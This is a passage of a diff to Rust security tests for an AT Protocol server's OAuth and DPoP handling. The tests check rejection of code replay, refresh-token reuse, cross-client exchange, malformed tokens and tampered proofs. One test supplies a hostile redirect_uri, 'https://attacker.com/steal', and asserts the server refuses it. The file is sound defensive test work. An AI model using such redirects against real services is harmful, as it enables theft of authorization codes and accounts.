consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 366 + .header("Content-Type", "application/json") 367 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 368 + .send().await.unwrap(); 369 + let consent_body: Value = consent_res.json().await.unwrap(); 370 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 371 + } 372 + let code = location 373 + .split("code=") 374 + .nth(1) 375 + .unwrap() 376 + .split('&') 377 + .next() 378 + .unwrap() 379 + .to_string(); 380 + let first = http_client 381 + .post(format!("{}/oauth/token", url)) 382 + .form(&[ 383 + ("grant_type", "authorization_code"), 384 + ("code", &code), 385 + ("redirect_uri", redirect_uri), 386 + ("code_verifier", &code_verifier), 387 + ("client_id", &client_id), 388 + ]) 389 + .send() 390 + .await 391 + .unwrap(); 190 392 assert_eq!(first.status(), StatusCode::OK, "First use should succeed"); 191 393 let first_body: Value = first.json().await.unwrap(); 192 - let replay = http_client.post(format!("{}/oauth/token", url)) 193 - .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 194 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 195 - .send().await.unwrap(); 196 - assert_eq!(replay.status(), StatusCode::BAD_REQUEST, "Auth code replay should fail"); 394 + let replay = http_client 395 + .post(format!("{}/oauth/token", url)) 396 + .form(&[ 397 + ("grant_type", "authorization_code"), 398 + ("code", &code), 399 + ("redirect_uri", redirect_uri), 400 + ("code_verifier", &code_verifier), 401 + ("client_id", &client_id), 402 + ]) 403 + .send() 404 + .await 405 + .unwrap(); 406 + assert_eq!( 407 + replay.status(), 408 + StatusCode::BAD_REQUEST, 409 + "Auth code replay should fail" 410 + ); 197 411 let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string(); 198 - let first_refresh: Value = http_client.post(format!("{}/oauth/token", url)) 199 - .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 200 - .send().await.unwrap().json().await.unwrap(); 201 - assert!(first_refresh["access_token"].is_string(), "First refresh should succeed"); 412 + let first_refresh: Value = http_client 413 + .post(format!("{}/oauth/token", url)) 414 + .form(&[ 415 + ("grant_type", "refresh_token"), 416 + ("refresh_token", &stolen_rt), 417 + ("client_id", &client_id), 418 + ]) 419 + .send() 420 + .await 421 + .unwrap() 422 + .json() 423 + .await 424 + .unwrap(); 425 + assert!( 426 + first_refresh["access_token"].is_string(), 427 + "First refresh should succeed" 428 + ); 202 429 let new_rt = first_refresh["refresh_token"].as_str().unwrap(); 203 - let rt_replay = http_client.post(format!("{}/oauth/token", url)) 204 - .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 205 - .send().await.unwrap(); 206 - assert_eq!(rt_replay.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail"); 430 + let rt_replay = http_client 431 + .post(format!("{}/oauth/token", url)) 432 + .form(&[ 433 + ("grant_type", "refresh_token"), 434 + ("refresh_token", &stolen_rt), 435 + ("client_id", &client_id), 436 + ]) 437 + .send() 438 + .await 439 + .unwrap(); 440 + assert_eq!( 441 + rt_replay.status(), 442 + StatusCode::BAD_REQUEST, 443 + "Refresh token replay should fail" 444 + ); 207 445 let body: Value = rt_replay.json().await.unwrap(); 208 - assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("reuse")); 209 - let family_revoked = http_client.post(format!("{}/oauth/token", url)) 210 - .form(&[("grant_type", "refresh_token"), ("refresh_token", new_rt), ("client_id", &client_id)]) 211 - .send().await.unwrap(); 212 - assert_eq!(family_revoked.status(), StatusCode::BAD_REQUEST, "Token family should be revoked"); 446 + assert!( 447 + body["error_description"] 448 + .as_str() 449 + .unwrap() 450 + .to_lowercase() 451 + .contains("reuse") 452 + ); 453 + let family_revoked = http_client 454 + .post(format!("{}/oauth/token", url)) 455 + .form(&[ 456 + ("grant_type", "refresh_token"), 457 + ("refresh_token", new_rt), 458 + ("client_id", &client_id), 459 + ]) 460 + .send() 461 + .await 462 + .unwrap(); 463 + assert_eq!( 464 + family_revoked.status(), 465 + StatusCode::BAD_REQUEST, 466 + "Token family should be revoked" 467 + ); 213 468 } 214 469 215 470 #[tokio::test] ··· 220 475 let mock_client = setup_mock_client_metadata(registered_redirect).await; 221 476 let client_id = mock_client.uri(); 222 477 let (_, code_challenge) = generate_pkce(); 223 - let res = http_client.post(format!("{}/oauth/par", url)) 224 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", "https://attacker.com/steal"), 225 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 226 - .send().await.unwrap(); 227 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 478 + let res = http_client 479 + .post(format!("{}/oauth/par", url)) 480 + .form(&[ 481 + ("response_type", "code"), 482 + ("client_id", &client_id), 483 + ("redirect_uri", "https://attacker.com/steal"), 484 + ("code_challenge", &code_challenge), 485 + ("code_challenge_method", "S256"), 486 + ]) 487 + .send() 488 + .await 489 + .unwrap(); 490 + assert_eq!( 491 + res.status(), 492 + StatusCode::BAD_REQUEST, 493 + "Unregistered redirect_uri should be rejected" 494 + ); 228 495 let ts = Utc::now().timestamp_millis(); 229 496 let handle = format!("deact-{}", ts); 230 497 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 232 499 .send().await.unwrap(); 233 500 let account: Value = create_res.json().await.unwrap(); 234 501 let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 235 - http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 236 - .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 237 - let deact_par: Value = http_client.post(format!("{}/oauth/par", url)) 238 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", registered_redirect), 239 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 240 - .send().await.unwrap().json().await.unwrap(); 502 + http_client 503 + .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 504 + .bearer_auth(&access_jwt) 505 + .json(&json!({})) 506 + .send() 507 + .await 508 + .unwrap(); 509 + let deact_par: Value = http_client 510 + .post(format!("{}/oauth/par", url)) 511 + .form(&[ 512 + ("response_type", "code"), 513 + ("client_id", &client_id), 514 + ("redirect_uri", registered_redirect), 515 + ("code_challenge", &code_challenge), 516 + ("code_challenge_method", "S256"), 517 + ]) 518 + .send() 519 + .await 520 + .unwrap() 521 + .json() 522 + .await 523 + .unwrap(); 241 524 let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 525 + .header("Content-Type", "application/json") 242 526 .header("Accept", "application/json") 243 - .form(&[("request_uri", deact_par["request_uri"].as_str().unwrap()), ("username", &handle), ("password", "deact-password"), ("remember_device", "false")]) 527 + .json(&json!({"request_uri": deact_par["request_uri"].as_str().unwrap(), "username": &handle, "password": "deact-password", "remember_device": false})) 244 528 .send().await.unwrap(); 245 - assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked"); 529 + assert_eq!( 530 + auth_res.status(), 531 + StatusCode::FORBIDDEN, 532 + "Deactivated account should be blocked" 533 + ); 246 534 let redirect_uri_a = "https://app-a.com/callback"; 247 535 let mock_a = setup_mock_client_metadata(redirect_uri_a).await; 248 536 let client_id_a = mock_a.uri(); ··· 256 544 let account2: Value = create_res2.json().await.unwrap(); 257 545 verify_new_account(&http_client, account2["did"].as_str().unwrap()).await; 258 546 let (code_verifier2, code_challenge2) = generate_pkce(); 259 - let par_a: Value = http_client.post(format!("{}/oauth/par", url)) 260 - .form(&[("response_type", "code"), ("client_id", &client_id_a), ("redirect_uri", redirect_uri_a), 261 - ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 262 - .send().await.unwrap().json().await.unwrap(); 263 - let auth_client = no_redirect_client(); 264 - let auth_a = auth_client.post(format!("{}/oauth/authorize", url)) 265 - .form(&[("request_uri", par_a["request_uri"].as_str().unwrap()), ("username", &handle2), ("password", "cross-password"), ("remember_device", "false")]) 547 + let par_a: Value = http_client 548 + .post(format!("{}/oauth/par", url)) 549 + .form(&[ 550 + ("response_type", "code"), 551 + ("client_id", &client_id_a), 552 + ("redirect_uri", redirect_uri_a), 553 + ("code_challenge", &code_challenge2), 554 + ("code_challenge_method", "S256"), 555 + ]) 556 + .send() 557 + .await 558 + .unwrap() 559 + .json() 560 + .await 561 + .unwrap(); 562 + let request_uri_a = par_a["request_uri"].as_str().unwrap(); 563 + let auth_a = http_client.post(format!("{}/oauth/authorize", url)) 564 + .header("Content-Type", "application/json") 565 + .header("Accept", "application/json") 566 + .json(&json!({"request_uri": request_uri_a, "username": &handle2, "password": "cross-password", "remember_device": false})) 266 567 .send().await.unwrap(); 267 - let loc_a = auth_a.headers().get("location").unwrap().to_str().unwrap(); 268 - let code_a = loc_a.split("code=").nth(1).unwrap().split('&').next().unwrap(); 269 - let cross_client = http_client.post(format!("{}/oauth/token", url)) 270 - .form(&[("grant_type", "authorization_code"), ("code", code_a), ("redirect_uri", redirect_uri_a), 271 - ("code_verifier", &code_verifier2), ("client_id", &client_id_b)]) 272 - .send().await.unwrap(); 273 - assert_eq!(cross_client.status(), StatusCode::BAD_REQUEST, "Cross-client code exchange must be rejected"); 568 + assert_eq!(auth_a.status(), StatusCode::OK); 569 + let auth_body_a: Value = auth_a.json().await.unwrap(); 570 + let mut loc_a = auth_body_a["redirect_uri"].as_str().unwrap().to_string(); 571 + if loc_a.contains("/oauth/consent") { 572 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 573 + .header("Content-Type", "application/json") 574 + .json(&json!({"request_uri": request_uri_a, "approved_scopes": ["atproto"], "remember": false})) 575 + .send().await.unwrap(); 576 + let consent_body: Value = consent_res.json().await.unwrap(); 577 + loc_a = consent_body["redirect_uri"].as_str().unwrap().to_string(); 578 + } 579 + let code_a = loc_a 580 + .split("code=") 581 + .nth(1) 582 + .unwrap() 583 + .split('&') 584 + .next() 585 + .unwrap(); 586 + let cross_client = http_client 587 + .post(format!("{}/oauth/token", url)) 588 + .form(&[ 589 + ("grant_type", "authorization_code"), 590 + ("code", code_a), 591 + ("redirect_uri", redirect_uri_a), 592 + ("code_verifier", &code_verifier2), 593 + ("client_id", &client_id_b), 594 + ]) 595 + .send() 596 + .await 597 + .unwrap(); 598 + assert_eq!( 599 + cross_client.status(), 600 + StatusCode::BAD_REQUEST, 601 + "Cross-client code exchange must be rejected" 602 + ); 274 603 } 275 604 276 605 #[tokio::test] 277 606 async fn test_malformed_tokens_and_headers() { 278 607 let url = base_url().await; 279 608 let http_client = client(); 280 - let malformed = vec!["", "not-a-token", "one.two", "one.two.three.four", "....", "eyJhbGciOiJIUzI1NiJ9", 281 - "eyJhbGciOiJIUzI1NiJ9.", "eyJhbGciOiJIUzI1NiJ9..", ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid!!.eyJ9.sig"]; 609 + let malformed = vec![ 610 + "", 611 + "not-a-token", 612 + "one.two", 613 + "one.two.three.four", 614 + "....", 615 + "eyJhbGciOiJIUzI1NiJ9", 616 + "eyJhbGciOiJIUzI1NiJ9.", 617 + "eyJhbGciOiJIUzI1NiJ9..", 618 + ".eyJzdWIiOiJ0ZXN0In0.", 619 + "!!invalid!!.eyJ9.sig", 620 + ]; 282 621 for token in &malformed { 283 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 284 - .bearer_auth(token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 622 + assert_eq!( 623 + http_client 624 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 625 + .bearer_auth(token) 626 + .send() 627 + .await 628 + .unwrap() 629 + .status(), 630 + StatusCode::UNAUTHORIZED 631 + ); 285 632 } 286 633 let wrong_types = vec!["JWT", "jwt", "at+JWT", ""]; 287 634 for typ in wrong_types { 288 635 let header = json!({ "alg": "HS256", "typ": typ }); 289 636 let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" }); 290 - let token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()), 291 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 292 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 293 - .bearer_auth(&token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "typ='{}' should be rejected", typ); 637 + let token = format!( 638 + "{}.{}.{}", 639 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()), 640 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), 641 + URL_SAFE_NO_PAD.encode(&[1u8; 32]) 642 + ); 643 + assert_eq!( 644 + http_client 645 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 646 + .bearer_auth(&token) 647 + .send() 648 + .await 649 + .unwrap() 650 + .status(), 651 + StatusCode::UNAUTHORIZED, 652 + "typ='{}' should be rejected", 653 + typ 654 + ); 294 655 } 295 656 let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 296 - let invalid_formats = vec![format!("Basic {}", access_token), format!("Digest {}", access_token), 297 - access_token.clone(), format!("Bearer{}", access_token)]; 657 + let invalid_formats = vec![ 658 + format!("Basic {}", access_token), 659 + format!("Digest {}", access_token), 660 + access_token.clone(), 661 + format!("Bearer{}", access_token), 662 + ]; 298 663 for auth in &invalid_formats { 299 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 300 - .header("Authorization", auth).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 664 + assert_eq!( 665 + http_client 666 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 667 + .header("Authorization", auth) 668 + .send() 669 + .await 670 + .unwrap() 671 + .status(), 672 + StatusCode::UNAUTHORIZED 673 + ); 301 674 } 302 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 303 - .send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 304 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 305 - .header("Authorization", "").send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 306 - let grants = vec!["client_credentials", "password", "implicit", "", "AUTHORIZATION_CODE"]; 675 + assert_eq!( 676 + http_client 677 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 678 + .send() 679 + .await 680 + .unwrap() 681 + .status(), 682 + StatusCode::UNAUTHORIZED 683 + ); 684 + assert_eq!( 685 + http_client 686 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 687 + .header("Authorization", "") 688 + .send() 689 + .await 690 + .unwrap() 691 + .status(), 692 + StatusCode::UNAUTHORIZED 693 + ); 694 + let grants = vec![ 695 + "client_credentials", 696 + "password", 697 + "implicit", 698 + "", 699 + "AUTHORIZATION_CODE", 700 + ]; 307 701 for grant in grants { 308 - assert_eq!(http_client.post(format!("{}/oauth/token", url)) 309 - .form(&[("grant_type", grant), ("client_id", "https://example.com")]) 310 - .send().await.unwrap().status(), StatusCode::BAD_REQUEST, "Grant '{}' should be rejected", grant); 702 + assert_eq!( 703 + http_client 704 + .post(format!("{}/oauth/token", url)) 705 + .form(&[("grant_type", grant), ("client_id", "https://example.com")]) 706 + .send() 707 + .await 708 + .unwrap() 709 + .status(), 710 + StatusCode::BAD_REQUEST, 711 + "Grant '{}' should be rejected", 712 + grant 713 + ); 311 714 } 312 715 } 313 716 ··· 316 719 let url = base_url().await; 317 720 let http_client = client(); 318 721 let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await; 319 - assert_eq!(http_client.post(format!("{}/oauth/revoke", url)) 320 - .form(&[("token", &refresh_token)]).send().await.unwrap().status(), StatusCode::OK); 321 - let introspect: Value = http_client.post(format!("{}/oauth/introspect", url)) 322 - .form(&[("token", &access_token)]).send().await.unwrap().json().await.unwrap(); 323 - assert_eq!(introspect["active"], false, "Revoked token should be inactive"); 722 + assert_eq!( 723 + http_client 724 + .post(format!("{}/oauth/revoke", url)) 725 + .form(&[("token", &refresh_token)]) 726 + .send() 727 + .await 728 + .unwrap() 729 + .status(), 730 + StatusCode::OK 731 + ); 732 + let introspect: Value = http_client 733 + .post(format!("{}/oauth/introspect", url)) 734 + .form(&[("token", &access_token)]) 735 + .send() 736 + .await 737 + .unwrap() 738 + .json() 739 + .await 740 + .unwrap(); 741 + assert_eq!( 742 + introspect["active"], false, 743 + "Revoked token should be inactive" 744 + ); 324 745 } 325 746 326 - fn create_dpop_proof(method: &str, uri: &str, _nonce: Option<&str>, ath: Option<&str>, iat_offset: i64) -> String { 747 + fn create_dpop_proof( 748 + method: &str, 749 + uri: &str, 750 + _nonce: Option<&str>, 751 + ath: Option<&str>, 752 + iat_offset: i64, 753 + ) -> String { 327 754 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 328 755 use p256::elliptic_curve::sec1::ToEncodedPoint; 329 756 let signing_key = SigningKey::random(&mut rand::thread_rng()); ··· 333 760 let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 334 761 let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 335 762 "htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset }); 336 - if let Some(a) = ath { payload["ath"] = json!(a); } 763 + if let Some(a) = ath { 764 + payload["ath"] = json!(a); 765 + } 337 766 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 338 767 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 339 768 let signing_input = format!("{}.{}", header_b64, payload_b64); 340 769 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 341 - format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())) 770 + format!( 771 + "{}.{}", 772 + signing_input, 773 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 774 + ) 342 775 } 343 776 344 777 #[test] ··· 350 783 let nonce = v1.generate_nonce(); 351 784 assert!(!nonce.is_empty()); 352 785 assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass"); 353 - assert!(v2.validate_nonce(&nonce).is_err(), "Nonce from different secret should fail"); 786 + assert!( 787 + v2.validate_nonce(&nonce).is_err(), 788 + "Nonce from different secret should fail" 789 + ); 354 790 let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap(); 355 791 let mut tampered = nonce_bytes.clone(); 356 - if !tampered.is_empty() { tampered[0] ^= 0xFF; } 357 - assert!(v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)).is_err(), "Tampered nonce should fail"); 792 + if !tampered.is_empty() { 793 + tampered[0] ^= 0xFF; 794 + } 795 + assert!( 796 + v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)) 797 + .is_err(), 798 + "Tampered nonce should fail" 799 + ); 358 800 assert!(v1.validate_nonce("invalid").is_err()); 359 801 assert!(v1.validate_nonce("").is_err()); 360 802 assert!(v1.validate_nonce("!!!not-base64!!!").is_err()); ··· 364 806 fn test_dpop_proof_validation() { 365 807 let secret = b"test-dpop-secret-32-bytes-long!!"; 366 808 let verifier = DPoPVerifier::new(secret); 367 - assert!(verifier.verify_proof("not.enough", "POST", "https://example.com", None).is_err()); 368 - assert!(verifier.verify_proof("invalid", "POST", "https://example.com", None).is_err()); 809 + assert!( 810 + verifier 811 + .verify_proof("not.enough", "POST", "https://example.com", None) 812 + .is_err() 813 + ); 814 + assert!( 815 + verifier 816 + .verify_proof("invalid", "POST", "https://example.com", None) 817 + .is_err() 818 + ); 369 819 let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 370 - assert!(verifier.verify_proof(&proof, "GET", "https://example.com/token", None).is_err(), "Method mismatch"); 371 - assert!(verifier.verify_proof(&proof, "POST", "https://other.com/token", None).is_err(), "URI mismatch"); 372 - assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None).is_ok(), "Query params should be ignored"); 820 + assert!( 821 + verifier 822 + .verify_proof(&proof, "GET", "https://example.com/token", None) 823 + .is_err(), 824 + "Method mismatch" 825 + ); 826 + assert!( 827 + verifier 828 + .verify_proof(&proof, "POST", "https://other.com/token", None) 829 + .is_err(), 830 + "URI mismatch" 831 + ); 832 + assert!( 833 + verifier 834 + .verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None) 835 + .is_ok(), 836 + "Query params should be ignored" 837 + ); 373 838 let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600); 374 - assert!(verifier.verify_proof(&old_proof, "POST", "https://example.com/token", None).is_err(), "iat too old"); 839 + assert!( 840 + verifier 841 + .verify_proof(&old_proof, "POST", "https://example.com/token", None) 842 + .is_err(), 843 + "iat too old" 844 + ); 375 845 let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600); 376 - assert!(verifier.verify_proof(&future_proof, "POST", "https://example.com/token", None).is_err(), "iat in future"); 377 - let ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, Some("wrong"), 0); 378 - assert!(verifier.verify_proof(&ath_proof, "GET", "https://example.com/resource", Some("correct")).is_err(), "ath mismatch"); 846 + assert!( 847 + verifier 848 + .verify_proof(&future_proof, "POST", "https://example.com/token", None) 849 + .is_err(), 850 + "iat in future" 851 + ); 852 + let ath_proof = create_dpop_proof( 853 + "GET", 854 + "https://example.com/resource", 855 + None, 856 + Some("wrong"), 857 + 0, 858 + ); 859 + assert!( 860 + verifier 861 + .verify_proof( 862 + &ath_proof, 863 + "GET", 864 + "https://example.com/resource", 865 + Some("correct") 866 + ) 867 + .is_err(), 868 + "ath mismatch" 869 + ); 379 870 let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0); 380 - assert!(verifier.verify_proof(&no_ath_proof, "GET", "https://example.com/resource", Some("expected")).is_err(), "Missing ath"); 871 + assert!( 872 + verifier 873 + .verify_proof( 874 + &no_ath_proof, 875 + "GET", 876 + "https://example.com/resource", 877 + Some("expected") 878 + ) 879 + .is_err(), 880 + "Missing ath" 881 + ); 381 882 } 382 883 383 884 #[test] ··· 398 899 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 399 900 let signing_input = format!("{}.{}", header_b64, payload_b64); 400 901 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 401 - let mismatched = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 402 - assert!(verifier.verify_proof(&mismatched, "POST", "https://example.com/token", None).is_err(), "Mismatched key should fail"); 902 + let mismatched = format!( 903 + "{}.{}", 904 + signing_input, 905 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 906 + ); 907 + assert!( 908 + verifier 909 + .verify_proof(&mismatched, "POST", "https://example.com/token", None) 910 + .is_err(), 911 + "Mismatched key should fail" 912 + ); 403 913 let point = signing_key.verifying_key().to_encoded_point(false); 404 914 let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", 405 915 "x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } }); ··· 409 919 let mut sig_bytes = good_sig.to_bytes().to_vec(); 410 920 sig_bytes[0] ^= 0xFF; 411 921 let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes)); 412 - assert!(verifier.verify_proof(&tampered, "POST", "https://example.com/token", None).is_err(), "Tampered sig should fail"); 922 + assert!( 923 + verifier 924 + .verify_proof(&tampered, "POST", "https://example.com/token", None) 925 + .is_err(), 926 + "Tampered sig should fail" 927 + ); 413 928 } 414 929 415 930 #[test] 416 931 fn test_jwk_thumbprint() { 417 - let jwk = DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), 932 + let jwk = DPoPJwk { 933 + kty: "EC".to_string(), 934 + crv: Some("P-256".to_string()), 418 935 x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 419 - y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()) }; 936 + y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()), 937 + }; 420 938 let tp1 = compute_jwk_thumbprint(&jwk).unwrap(); 421 939 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 422 940 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 423 941 assert!(!tp1.is_empty()); 424 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("secp256k1".to_string()), 425 - x: Some("x".to_string()), y: Some("y".to_string()) }).is_ok()); 426 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "OKP".to_string(), crv: Some("Ed25519".to_string()), 427 - x: Some("x".to_string()), y: None }).is_ok()); 428 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: None, x: Some("x".to_string()), y: Some("y".to_string()) }).is_err()); 429 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: None, y: Some("y".to_string()) }).is_err()); 430 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: Some("x".to_string()), y: None }).is_err()); 431 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "RSA".to_string(), crv: None, x: None, y: None }).is_err()); 942 + assert!( 943 + compute_jwk_thumbprint(&DPoPJwk { 944 + kty: "EC".to_string(), 945 + crv: Some("secp256k1".to_string()), 946 + x: Some("x".to_string()), 947 + y: Some("y".to_string()) 948 + }) 949 + .is_ok() 950 + ); 951 + assert!( 952 + compute_jwk_thumbprint(&DPoPJwk { 953 + kty: "OKP".to_string(), 954 + crv: Some("Ed25519".to_string()), 955 + x: Some("x".to_string()), 956 + y: None 957 + }) 958 + .is_ok() 959 + ); 960 + assert!( 961 + compute_jwk_thumbprint(&DPoPJwk { 962 + kty: "EC".to_string(), 963 + crv: None, 964 + x: Some("x".to_string()), 965 + y: Some("y".to_string()) 966 + }) 967 + .is_err() 968 + ); 969 + assert!( 970 + compute_jwk_thumbprint(&DPoPJwk { 971 + kty: "EC".to_string(), 972 + crv: Some("P-256".to_string()), 973 + x: None, 974 + y: Some("y".to_string()) 975 + }) 976 + .is_err() 977 + ); 978 + assert!( 979 + compute_jwk_thumbprint(&DPoPJwk { 980 + kty: "EC".to_string(), 981 + crv: Some("P-256".to_string()), 982 + x: Some("x".to_string()), 983 + y: None 984 + }) 985 + .is_err() 986 + ); 987 + assert!( 988 + compute_jwk_thumbprint(&DPoPJwk { 989 + kty: "RSA".to_string(), 990 + crv: None, 991 + x: None, 992 + y: None 993 + }) 994 + .is_err() 995 + ); 432 996 } 433 997 434 998 #[test] ··· 437 1001 use p256::elliptic_curve::sec1::ToEncodedPoint; 438 1002 let secret = b"test-dpop-secret-32-bytes-long!!"; 439 1003 let verifier = DPoPVerifier::new(secret); 440 - let test_cases = vec![(-600, true), (-301, true), (-299, false), (0, false), (299, false), (301, true), (600, true)]; 1004 + let test_cases = vec![ 1005 + (-600, true), 1006 + (-301, true), 1007 + (-299, false), 1008 + (0, false), 1009 + (299, false), 1010 + (301, true), 1011 + (600, true), 1012 + ]; 441 1013 for (offset, should_fail) in test_cases { 442 1014 let signing_key = SigningKey::random(&mut rand::thread_rng()); 443 1015 let point = signing_key.verifying_key().to_encoded_point(false); ··· 450 1022 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 451 1023 let signing_input = format!("{}.{}", header_b64, payload_b64); 452 1024 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 453 - let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 1025 + let proof = format!( 1026 + "{}.{}", 1027 + signing_input, 1028 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 1029 + ); 454 1030 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 455 - if should_fail { assert!(result.is_err(), "offset {} should fail", offset); } 456 - else { assert!(result.is_ok(), "offset {} should pass", offset); } 1031 + if should_fail { 1032 + assert!(result.is_err(), "offset {} should fail", offset); 1033 + } else { 1034 + assert!(result.is_ok(), "offset {} should pass", offset); 1035 + } 457 1036 } 458 1037 } 459 1038 ··· 474 1053 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 475 1054 let signing_input = format!("{}.{}", header_b64, payload_b64); 476 1055 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 477 - let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 478 - assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token", None).is_ok(), "HTTP method should be case-insensitive"); 1056 + let proof = format!( 1057 + "{}.{}", 1058 + signing_input, 1059 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 1060 + ); 1061 + assert!( 1062 + verifier 1063 + .verify_proof(&proof, "POST", "https://example.com/token", None) 1064 + .is_ok(), 1065 + "HTTP method should be case-insensitive" 1066 + ); 479 1067 }
+111 -25
tests/plc_operations.rs
